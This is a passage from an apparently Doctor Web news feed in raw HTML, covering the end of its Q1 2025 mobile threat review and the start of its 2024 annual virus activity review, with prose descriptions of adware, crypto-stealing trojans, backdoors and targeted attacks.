          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/02_unwanted_q1_2025_en.png" alt="Unwanted_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, users can remotely manage these apps. They can block them, display custom dialogs, and track when other software is being installed or removed from a device, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, take photos and video with the camera, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/03_riskware_q1_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/03_riskware_q1_2025_en.png" alt="Riskware_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software based on the Lua scripting language. The main logic of Lua-based apps resides in the corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A riskware platform that allows applications to launch APK files without installing them. It creates a virtual runtime environment in the context of the apps in which they are integrated. The APK files launched with the help of this platform can operate as if they are part of such programs and can also obtain the same permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change the logic of their work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads specially prepared scripts from the Internet, which can be crafted and added to the common database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A packer tool designed to protect Android applications from unauthorized modifications and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/04_adware_q1_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/04_adware_q1_2025_en.png" alt="Adware_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some modified versions (mods) of the WhatsApp messenger, whose functions have been injected with a specific code. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) when the messenger is in operation. Such web addresses perform redirects to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; unwanted applications.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An adware module that malicious actors embed into the cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="gplay"&gt;
    &lt;h2 class="alignCenter"&gt;Threats on Google Play&lt;/h2&gt;
    &lt;p&gt;
        In Q1 2025, Doctor Web’s virus laboratory detected several dozen malicious programs. Among them were various modifications of the trojans 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4215&lt;/b&gt;, which conceal their presence on infected devices and 
        start displaying ads on top of other apps’ windows and the operating system UI. They masqueraded as software for taking photos and videos 
        with different effects, image-editing programs, an image collection app, and a women’s health diary.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/05_Android.HiddenAds.4213_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/05_Android.HiddenAds.4213_q1_2025.png" alt="Android.HiddenAds_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/06_Android.HiddenAds.4215_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/06_Android.HiddenAds.4215_q1_2025.png" alt="Android.HiddenAds_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        The &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans concealed in the apps “Time Shift Cam” and “Fusion Collage Editor”
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        Our specialists also discovered &lt;a href="https://vms.drweb.com/search/?q=Android.CoinSteal&amp;lng=en"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.202&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.CoinSteal&amp;lng=en"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.203&lt;/b&gt;, and 
        &lt;a href="https://vms.drweb.com/search/?q=Android.CoinSteal&amp;lng=en"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt;, malicious programs designed to steal cryptocurrency that are distributed under the guise 
        of official software from the Raydium and Aerodrome Finance blockchain platforms and the Dydx cryptocurrency exchange.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/07_Android.CoinSteal.202_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/07_Android.CoinSteal.202_q1_2025.png" alt="Android.CoinSteal_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/08_Android.CoinSteal.203_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/08_Android.CoinSteal.203_q1_2025.png" alt="Android.CoinSteal_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        The “Raydium” and “Dydx Exchange” programs are trojans that steal cryptocurrency
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        When launched, these malicious apps ask potential victims to enter a mnemonic phrase (the seed phrase)—supposedly to connect their crypto wallet. 
        But, in reality, the data that users provide is sent to threat actors. To further mislead users, forms for entering mnemonic phrases can be disguised 
        as requests from other crypto platforms. As shown in the example below, &lt;a href="https://vms.drweb.com/search/?q=Android.CoinSteal&amp;lng=en"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt; 
        displayed a phishing form allegedly on behalf of the crypto exchange PancakeSwap.
    &lt;/p&gt;
    &lt;div class=" flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/09_seed_q1_2025.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/09_seed_q1_2025.1.png" alt="PancakeSwap"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/10_seed_q1_2025.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/10_seed_q1_2025.1.png" alt="PancakeSwap"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p&gt;
        At the same time, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs were once again being distributed via Google Play. 
        Fraudsters passed off many of them as finance-related software, including teaching aids, instruments for accessing 
        investing services, and personal finance software. They loaded various phishing websites, including those used by threat actors to collect personal information.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/11_Android.FakeApp.1803_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/11_Android.FakeApp.1803_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/12_Android.FakeApp.1777_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/12_Android.FakeApp.1777_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojan apps distributed under the guise of financial software: «Умные Деньги» (“Smart Money”) is &lt;b&gt;Android.FakeApp.1803&lt;/b&gt;, 
        and “Economic Union” is &lt;b&gt;Android.FakeApp.1777&lt;/b&gt;
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        Under certain conditions, other &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans loaded bookmaker and online casino sites. Such malware variants were distributed as different games and other software, 
        like a speed-typing trainer and a drawing tutorial. Among them were new modifications of the 
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1669&lt;/b&gt; trojan.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/13_Android.FakeApp.1669_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/13_Android.FakeApp.1669_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/14_Android.FakeApp.1669_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/14_Android.FakeApp.1669_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of malicious fake apps that, instead of providing the declared functionality, could load online casino and bookmaker websites
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.
    &lt;/p&gt;
&lt;/section&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q1%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;

</description></item><item><guid>https://news.drweb.com/show/?i=14965&amp;lng=en</guid><title>Doctor Web’s annual virus activity review for 2024</title><link>https://news.drweb.com/show/?i=14965&amp;lng=en&amp;c=9</link><pubDate>Thu, 30 Jan 2025 00:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;January 30, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;In 2024, malicious programs created with the AutoIt scripting language and distributed as part of other malicious apps to make the latter more difficult to detect were once again among the most widespread threats. In addition, adware trojans and all kinds of malicious scripts were highly active. In email traffic, malicious scripts were also most commonly detected. Furthermore, threat actors used spam emails to distribute various trojans, phishing documents, and exploits that allow arbitrary code to be executed.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        Ad-displaying trojans, spyware trojans, and unwanted adware apps were the threats most commonly 
        detected on mobile devices. Throughout the year, increasing activity on the part of mobile banking 
        trojans was observed. In addition, our virus laboratory discovered hundreds of malicious and unwanted 
        programs on Google Play.
    &lt;/p&gt;
    &lt;p&gt;
        Doctor Web’s Internet analysts noted high activity on the part of online fraudsters, whose arsenal included both old and new schemes for deceiving users.
    &lt;/p&gt;
    &lt;p&gt;
        Compared to 2023, the number of user requests to decrypt files affected by encoder trojans decreased. 
        At the same time, our specialists observed many information security incidents and events. 
        Over the course of the year, Doctor Web investigated several targeted attacks, uncovered another infection 
        impacting Android TV box sets, and repelled an attack on its own infrastructure.
    &lt;/p&gt;
    
    &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
        &lt;h4 class="white alignCenter"&gt;Principal trends of the year&lt;/h4&gt;
        &lt;ul&gt;
          &lt;li&gt;Trojans created with the AutoIt scripting language remained highly active.&lt;/li&gt;
          &lt;li&gt;Malicious scripts were among the most widespread threats.&lt;/li&gt;
          &lt;li&gt;Malicious scripts and various trojans were among the threats most commonly detected in email traffic.&lt;/li&gt;
          &lt;li&gt;New targeted attacks were detected.&lt;/li&gt;
          &lt;li&gt;Threat actors exploited eBPF technology more often to conceal their malicious activity.&lt;/li&gt;
          &lt;li&gt;The number of requests to decrypt files affected by encoder trojans decreased.&lt;/li&gt;
          &lt;li&gt;Internet fraudsters were highly active.&lt;/li&gt;
          &lt;li&gt;Cybercriminals used mobile banking trojans more frequently.&lt;/li&gt;
          &lt;li&gt;Many new threats were discovered on Google Play.&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h2 class="alignCenter"&gt;The most notable events of 2024&lt;/h2&gt;
    &lt;p&gt;
        In January, Doctor Web’s specialists &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14792" target="_blank" rel="noopener noreferrer"&gt;informed&lt;/a&gt; 
        customers about the mining trojan &lt;a href="https://vms.drweb.com/search/?q=Trojan.BtcMine.3767&amp;lng=en"&gt;&lt;b&gt;Trojan.BtcMine.3767&lt;/b&gt;&lt;/a&gt;, which was concealed in pirated programs that were being 
        distributed via a specially created Telegram channel and a number of websites. This malware infected tens of thousands of 
        Windows computers. To anchor itself in an attacked system, it created a scheduler task for its own autorun and added itself 
        to the Windows Defender anti-virus exceptions. Next, it injected a component directly responsible for cryptocurrency mining into 
        &lt;span class="string"&gt;explorer.exe&lt;/span&gt; (Windows Explorer). 
        &lt;a href="https://vms.drweb.com/search/?q=Trojan.BtcMine.3767&amp;lng=en"&gt;&lt;b&gt;Trojan.BtcMine.3767&lt;/b&gt;&lt;/a&gt; also allowed a number of other malicious actions to be performed, e.g., fileless rootkits can be installed, 
        access to websites can be blocked, and Windows updates can be disabled.
    &lt;/p&gt;
    &lt;p&gt;
        In March, our company &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14823" target="_blank" rel="noopener noreferrer"&gt;published research&lt;/a&gt; 
        on a targeted attack against a Russian enterprise in the mechanical-engineering sector. An investigation into the incident revealed a multi-stage 
        infection vector and the use of several malicious programs by the attackers. Among these programs, of greatest interest was the &lt;a href="https://vms.drweb.com/search/?q=JS.BackDoor.60&amp;lng=en"&gt;&lt;b&gt;JS.BackDoor.60&lt;/b&gt;&lt;/a&gt; 
        backdoor, through which the main interaction between the attackers and the infected computer took place. This trojan uses its own JavaScript framework and 
        consists of a main body and additional modules. It allows files to be stolen from infected machines, keystrokes to be hijacked, and screenshots to be taken. 
        It can download its own updates and expand its functionality by downloading new modules.
    &lt;/p&gt;
    &lt;p&gt;
        In May, Doctor Web’s virus analysts &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14860" target="_blank" rel="noopener noreferrer"&gt;discovered&lt;/a&gt; 
        the trojan clicker &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; in Love Spouse, an app used to control adult toys, and also in the QRunning app, used to track 
        physical activity. Both were distributed through Google Play. &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; was disguised as a component for collecting debugging 
        information and was embedded into several new versions of the target apps. Later, the developer of the Love Spouse program updated the app, and the 
        trojan was no longer present in it. There was no reaction from the developer of the second program. &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; 
        had modular architecture and could perform various malicious tasks with the help of its components. It could collect information about an infected device, 
        covertly load webpages, display ads, perform clicks, and interact with the contents of loaded pages.
    &lt;/p&gt;
    &lt;p&gt;
        In July, we &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14877" target="_blank" rel="noopener noreferrer"&gt;informed&lt;/a&gt; users about the emergence of a Linux version 
        of the well-known remote access trojan TgRat, which is used for targeted attacks on computers. Dubbed &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.TgRat.2&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.TgRat.2&lt;/b&gt;&lt;/a&gt;, the new variant of this 
        malware was discovered during an investigation into an information security incident that a hosting provider contacted us about. Dr.Web anti-virus detected a suspicious 
        file on the server of one of their clients; it turned out to be the backdoor dropper that actually installed the trojan. Threat actors controlled 
        &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.TgRat.2&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.TgRat.2&lt;/b&gt;&lt;/a&gt; through a private Telegram group, using the Telegram bot connected to it. 
        Through the messenger, they could download files from a compromised system, take screenshots, remotely execute commands, or upload files to a computer via chat attachments.
    &lt;/p&gt;
    &lt;p&gt;
        In early September, we published an &lt;a href="https://news.drweb.com/show/?i=14899&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;article&lt;/a&gt; 
        on our website, detailing the case of a failed spear-phishing attack on a major Russian enterprise in the rail freight industry. Several months 
        earlier, the company’s information security team had detected a suspicious email with a file attached to it. Our virus analysts’ examination of 
        it showed that it was a Windows shortcut disguised as a PDF document, and that it had hardcoded parameters for launching the PowerShell command 
        interpreter. Opening this shortcut would lead to a multi-stage infection of the target system, with several malicious programs designed for cyber 
        espionage. One of them was &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen27.11306&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen27.11306&lt;/b&gt;&lt;/a&gt;, which exploited the 
        &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6473" target="_blank" rel="noopener noreferrer"&gt;CVE-2024-6473&lt;/a&gt; vulnerability in 
        Yandex Browser to intercept the DLL search order (DLL Search Order Hijacking). The trojan placed a malicious DLL library into the browser installation 
        directory; this file had the same name as the system component &lt;span class="string"&gt;Wldp.dll&lt;/span&gt; responsible for securely launching applications. 
        Since the malicious file was located in the browser directory, it received higher priority to be loaded when the program was launched, thanks to the 
        browser vulnerability. The library also obtained all the permissions of the browser. This vulnerability was later fixed.
    &lt;/p&gt;
    &lt;p&gt;
        A little later, our specialists &lt;a href="https://news.drweb.com/show/?i=14900&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;reported&lt;/a&gt; 
        on another attack on Android-based TV box sets. In this campaign, the malicious program &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; 
        was used. It infected nearly 1.3 million devices belonging to users in 197 countries. This was a modular backdoor that placed its components 
        into the system storage area and, upon receiving the attackers’ commands, could covertly download and run other programs.
    &lt;/p&gt;
    &lt;p&gt;
        Moreover, in September, we detected a &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14904" target="_blank" rel="noopener noreferrer"&gt;targeted attack&lt;/a&gt; 
        on our company’s resources. Doctor Web’s specialists promptly stopped the attempt to damage our infrastructure, 
        &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14907" target="_blank" rel="noopener noreferrer"&gt;successfully repelling the attack&lt;/a&gt;. 
        At the same time, none of our users were harmed.
    &lt;/p&gt;
    &lt;p&gt;
        In October, Doctor Web’s virus analysts &lt;a href="https://news.drweb.com/show/?i=14918&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;reported&lt;/a&gt;
        on the discovery of a number of new malicious programs for Linux. They were uncovered thanks to a study of attacks on devices that had the Redis 
        database management system installed on them. This system is increasingly becoming the target of cybercriminals wanting to exploit the various 
        vulnerabilities in it. Among the threats detected were backdoors, droppers, and a new modification of a rootkit that installs the Skidmap mining 
        trojan on compromised devices. This miner has been active since 2019, and its primary targets are large servers and cloud environments.
    &lt;/p&gt;
    &lt;p&gt;
        Also in October, our virus laboratory uncovered a &lt;a href="https://news.drweb.com/show/?i=14920&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;large-scale campaign&lt;/a&gt;
        aimed at distributing malware for cryptocurrency mining and theft. Over 28,000 users, most of whom were from Russia, suffered from the actions of the attackers. The trojans 
        were hiding in pirated software that was being distributed via fraudulent websites created on the GitHub platform. In addition, the malware creators placed links for downloading 
        malicious programs under videos posted on the YouTube platform.
    &lt;/p&gt;
    &lt;p&gt;
        In November, our experts &lt;a href="https://news.drweb.com/show/?i=14935&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;discovered&lt;/a&gt;
        a number of new variants of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; trojan, whose task is to load websites. Unlike the malware most similar to it, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; receives target website addresses from the TXT records of malicious DNS servers. For this, it uses the modified 
        code of the open-source library dnsjava. At the same time, the trojan exhibits malicious activity only when connected to the Internet through 
        certain providers. In other cases, it operates as harmless software.
    &lt;/p&gt;
    &lt;p&gt;
        At the end of 2024, while investigating a request from one of our clients, Doctor Web’s virus laboratory specialists detected an ongoing
        &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14955" target="_blank" rel="noopener noreferrer"&gt;hacker campaign&lt;/a&gt;
        primarily targeting users from Southeast Asia. During the attacks, cybercriminals used a range of malicious programs as well as methods 
        and techniques that are only increasing in popularity among virus writers. One of them involves exploiting eBPF (extended Berkeley Packet 
        Filter) technology, which was created to provide enhanced control over the network subsystem of the Linux operating system and its processes. 
        This technology was used to conceal malicious network activity and processes, collect confidential information, and bypass firewalls and 
        intrusion detection systems. Another technique involved storing the trojan configuration not on the C&amp;C server, but on public platforms such 
        as GitHub and blogs. The third feature of the attacks was the use of post-exploitation frameworks in tandem with malicious apps. Although such 
        tools are not malicious and are used in security audits of digital systems, their functionality and the presence of vulnerability databases 
        can expand the capabilities of attackers.
    &lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="virobst"&gt;
    &lt;h2 class="alignCenter"&gt;The malware landscape&lt;/h2&gt;
    &lt;p&gt;
        According to the statistics collected by Dr.Web anti-virus, the total number of threats detected in 2024 increased by 26.20%, compared to 2023. 
